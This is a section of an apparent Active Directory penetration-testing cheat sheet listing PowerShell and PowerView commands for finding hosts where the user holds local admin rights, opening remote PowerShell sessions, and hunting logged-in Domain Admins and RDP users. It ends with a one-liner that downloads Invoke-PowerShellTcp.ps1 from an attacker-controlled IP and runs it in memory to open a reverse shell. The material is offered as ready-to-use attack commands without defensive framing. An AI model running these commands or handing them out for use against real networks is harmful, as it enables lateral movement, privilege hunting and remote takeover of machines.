9️⃣Miscellaneous Enumeration

Find-LocalAdminAccess -Verbose

. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess

. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

Invoke-EnumerateLocalAdmin -Verbose

Enter-PSSession -Computername <computername>

$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"

Invoke-UserHunter -Groupname "Domain Admins"

Invoke-UserHunter -CheckAccess

Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IP